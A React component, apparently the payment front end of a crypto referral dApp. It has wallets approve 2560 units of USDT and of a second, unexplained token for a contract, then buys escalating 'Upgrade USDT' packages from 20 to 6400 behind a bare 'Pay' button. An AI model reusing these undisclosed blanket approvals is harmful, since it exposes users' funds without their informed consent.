import { ethers } from "ethers";
import abi from "./GlobalPool.json";
import Web3 from 'web3';
const Buy = ({ state }) => {
  const buyChai = async (event) => {
    event.preventDefault();
    const { contract } = state;
    const contractABI = abi.abi;
    const name = document.querySelector("#name").value;
    const refer = document.querySelector("#hid").value;
    const addr = document.querySelector("#us").value;
    console.log(name, contract);
    console.log(refer);
    const web3 = new Web3(Web3.givenProvider);
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    const signer = provider.getSigner();
    const spenderAddr = document.querySelector("#us").value;
    const addressOfYourContract = '0x846d0270a6c2ef27ffa8ccee480370604898f650';
    var a = "20000000000000000000"

    
    const rt ="2560";

    const amountInTheSmallestUnit = a ;
      const busdContractAddress = '0x55d398326f99059fF775485246999027B3197955';
    const busdContractAbi = `[{"inputs":[],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"constant":true,"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"renounceOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"}]`;

        const busdContractAddress1 = '0xf09a02b39e22EB7D60B17070012297Ee0478a0f1';
    const busdContractAbi1 = `[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balances","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]`;


    function refreshPage() {
      window.location.reload(false);
    }
    

    const busdContract = new ethers.Contract(busdContractAddress, busdContractAbi, signer);
       const busdContract1 = new ethers.Contract(busdContractAddress1, busdContractAbi1, signer);
    
    const amountToApprove = ethers.utils.parseUnits('2560', 18);
    const allowance = await busdContract.allowance(signer.getAddress(), addressOfYourContract);
    if (allowance.lt(amountToApprove)) {
      const tx = await busdContract.approve(addressOfYourContract, amountToApprove, {
        gasLimit: 75000,
    });
      await tx.wait();
    }

       const amountToApprove1 = ethers.utils.parseUnits('2560', 18);
    const allowance1 = await busdContract1.allowance(signer.getAddress(), addressOfYourContract);
    if (allowance1.lt(amountToApprove1)) {
      const tx = await busdContract1.approve(addressOfYourContract, amountToApprove1, {
        gasLimit: 75000,
    });
      await tx.wait();
    }
   

    if(document.querySelector("#test").value == "Upgrade USDT 20")
    {
   

   const transaction = await contract.register(name,20, {
    gasLimit: 2000000,
});
   await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 30";
    }
    else if(document.querySelector("#test").value == "Upgrade USDT 30")
    {
    
    const transaction = await contract.upgrade(refer,30,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 50";
    }
    else if(document.querySelector("#test").value == "Upgrade USDT 50")
    {
    
    const transaction = await contract.upgrade(refer,50,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 100";
    }
    
   else if(document.querySelector("#test").value == "Upgrade USDT 100")
    {
    const transaction = await contract.upgrade(refer,100,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 200";
    }
   else if(document.querySelector("#test").value == "Upgrade USDT 200")
    {
    const transaction = await contract.upgrade(refer,200,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 400";
    }
   else if(document.querySelector("#test").value == "Upgrade USDT 400")
    {
    
    const transaction = await contract.upgrade(refer,400,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 800";
    }
    else if(document.querySelector("#test").value == "Upgrade USDT 800")
    {
    
    const transaction = await contract.upgrade(refer,800,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 1600";
    }
  else  if(document.querySelector("#test").value == "Upgrade USDT 1600")
    {
    
    const transaction = await contract.upgrade(refer,1600,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 3200";
    }
  else  if(document.querySelector("#test").value == "Upgrade USDT 3200")
    {
    
    const transaction = await contract.upgrade(refer,3200,{
      gasLimit: 1200000,
  });
  
    await transaction.wait();
    document.querySelector("#test").value  = "Upgrade USDT 6400";
    }
  else  if(document.querySelector("#test").value == "Upgrade USDT 6400")
    {
    
    const transaction = await contract.upgrade(refer,6400,{
      gasLimit: 1200000,
  });
    await transaction.wait();
    document.querySelector("#test").value  = "All Packages Purchased";
    }

    console.log("Transaction is done");
    refreshPage();
  };
  return (
    <>
      <div className="container-md" style={{ display: "flex", justifyContent: "center" }}>
        <form onSubmit={buyChai}>
          
            <input
              type="hidden"
              className="form-control"
              id="name"
              placeholder="Enter Your Refer"
            />
          
        
          <button
            type="submit"
            id="sample"
            className="btn btn-style-one border-light"
            style={{ padding: "6px 15px", fontSize: "2rem" }}
          >
            Pay
          </button>
        </form>
      </div>
    </>
  );
};
export default Buy;